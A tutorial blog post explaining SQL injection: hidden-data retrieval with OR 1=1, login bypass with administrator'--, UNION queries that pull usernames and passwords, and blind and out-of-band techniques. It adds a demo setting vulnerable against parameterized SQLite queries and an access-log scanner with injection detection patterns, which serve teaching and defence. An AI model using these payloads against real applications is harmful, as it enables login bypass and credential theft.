Why and How to do SQL Injection?

SELECT * FROM products WHERE category = 'Pens'

This query asks the database for:

  • all details (*)
  • from the products table
  • where the category is 'Pens'

Depending on how the application builds that query, an attacker can use it for:

  • Retrieving hidden data, where you can modify an SQL query to return additional results.
  • Subverting application logic, where you can change a query to interfere with the application's logic.
  • UNION attacks, where you can retrieve data from different database tables.
  • Examining the database, where you can extract information about the version and structure of the database.

1. Retrieving hidden data.

SELECT * FROM products WHERE category = 'Pens' AND released = 1

Using MySQL comment syntax (#, or -- followed by a space) cuts off the rest of the query, so the released = 1 filter is never applied and the OR 1=1 condition matches every row:

SELECT * FROM products WHERE category = 'Pens' OR 1=1 #' AND released = 1

2. Subverting application logic.

SELECT * FROM users WHERE username = 'sumo' AND password = 'iamcybermight'

SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
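Both the hidden-data and the logic-bypass queries above come from the same defect: user input pasted into the SQL text. The following added example (not from the original post) builds a small in-memory SQLite database with assumed products and users tables, runs the two queries in their string-concatenated form beside a parameterized form, and shows that the bound parameter turns the same payloads into plain data. SQLite has no # comment, so the payloads use the -- comment form the post shows in the login example.

```python
import sqlite3

# Constructed in-memory stand-in for the post's store database. The table
# names, columns and rows are assumptions made for this example; passwords are
# stored in plaintext only to keep the demo short.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Blue pen', 'Pens', 1);
        INSERT INTO products VALUES ('Unreleased pen', 'Pens', 0);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cret');
        INSERT INTO users VALUES ('sumo', 'iamcybermight');
    """)
    return conn


# Vulnerable: the category value is concatenated into the SQL text, the
# pattern behind SELECT * FROM products WHERE category = 'Pens' AND released = 1.
def products_vulnerable(conn: sqlite3.Connection, category: str) -> list:
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return sorted(row[0] for row in conn.execute(sql))


# Hardened: the value is bound as a parameter, so quotes and comment markers
# inside it are compared as data and never parsed as SQL syntax.
def products_safe(conn: sqlite3.Connection, category: str) -> list:
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in conn.execute(sql, (category,)))


# Vulnerable login check: username = 'administrator'-- comments out the
# password comparison, so the row matches without any password.
def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


# Hardened login check: both values are bound, so the comment marker is just
# part of a username that does not exist.
def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "Pens' OR 1=1--"
    print("vulnerable, injected :", products_vulnerable(db, payload))
    print("safe, injected       :", products_safe(db, payload))
    print("safe, normal         :", products_safe(db, "Pens"))
    print("vulnerable login     :", login_vulnerable(db, "administrator'--", ""))
    print("safe login           :", login_safe(db, "administrator'--", ""))
```

Running it shows the vulnerable product search returning the unreleased product and the Gifts item for the injected category, while the parameterized search returns nothing for the payload and only the released pen for the real category; the vulnerable login accepts the administrator with an empty password, the parameterized one does not.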

3. UNION attacks.

SELECT name, description FROM products WHERE category = 'Pens'

' UNION SELECT username, password FROM users--

https://www.iamcyberstore/category?id=Pens'+UNION+SELECT+username,+password+FROM+users--

For a UNION query to work, two requirements must be met:

  • The individual queries must return the same number of columns.
  • The data types in each column must be compatible between the individual queries.

So the first two things to determine are:

  • How many columns does the original query return?
  • Which columns returned from the original query are of a suitable data type to hold the results from the injected query?

4. Examining the database.

Default syntax to determine the database type and version (table image, copyright PortSwigger)

When the results of the query are not returned directly in the application's responses, the truth of a condition can still be inferred in one of the following ways:

  • You can change the logic of the query to trigger a detectable difference in the application's response depending on the truth of a single condition. This might involve injecting a new condition into some Boolean logic or conditionally triggering an error such as a divide-by-zero.
  • You can conditionally trigger a time delay in the processing of the query, allowing you to infer the truth of the condition based on the time that the application takes to respond.
  • You can trigger an out-of-band network interaction, using OAST techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly exfiltrate data via the out-of-band channel, for example by placing the data into a DNS lookup for a domain that you control.
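The encoded URL in the UNION section shows what these payloads look like on the wire, and the time-delay technique above is the one blind variant that leaves an obvious trace in the request itself. The following added example (not from the original post) is a small log scanner: it parses constructed web-server access log lines, decodes the query string so that + and %xx encodings no longer hide keywords, and flags requests carrying UNION SELECT, comment truncation, an OR 1=1 tautology, or a time-delay call. The log format, IP addresses and signature list are assumptions for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures matched against the decoded, lower-cased query string. Each
# corresponds to a technique from the text: UNION-based retrieval, comment
# truncation, an always-true condition, and time-delay probes for blind injection.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b"),
    "comment_truncation": re.compile(r"(--|#|/\*)"),
    "tautology": re.compile(r"\bor\b\s+1\s*=\s*1\b"),
    "time_delay": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b"),
}

# Common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access log (assumed addresses and timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /category?id=Pens HTTP/1.1" 200 1234',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] '
    '"GET /category?id=Pens\'+UNION+SELECT+username,+password+FROM+users-- HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /category?id=Pens%27%20OR%201%3D1%23 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:56:30 +0000] "GET /category?id=Pens%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 1234',
    '192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /category?id=Gifts HTTP/1.1" 200 1100',
]


def decode_query(target: str) -> str:
    """Return the decoded query string of a request target, lower-cased.

    Only the query string is inspected, so a '#' produced by %23 is seen as a
    comment marker while a literal '#' (a fragment, never sent to the server)
    is not.
    """
    return unquote_plus(urlsplit(target).query).lower()


def classify(log_line: str):
    """Parse one log line and return its ip, status and the signature names it hits."""
    m = LOG_LINE.match(log_line)
    if not m:
        return None  # unparseable line: skipped, not silently treated as clean
    decoded = decode_query(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "status": m.group("status"), "hits": hits}


def scan(lines) -> list:
    """Return (ip, hits) for every line that matched at least one signature."""
    flagged = []
    for line in lines:
        record = classify(line)
        if record and record["hits"]:
            flagged.append((record["ip"], record["hits"]))
    return flagged


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(f"{ip:15} {', '.join(hits)}")
```

Decoding before matching is the important step: without it the UNION request only contains the token "UNION+SELECT", and the tautology request only "OR%201%3D1%23", neither of which a naive keyword search would catch. A 200 status on a flagged request is worth a closer look than a 500, since it means the injected query ran rather than failed.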
Sumanth Dodda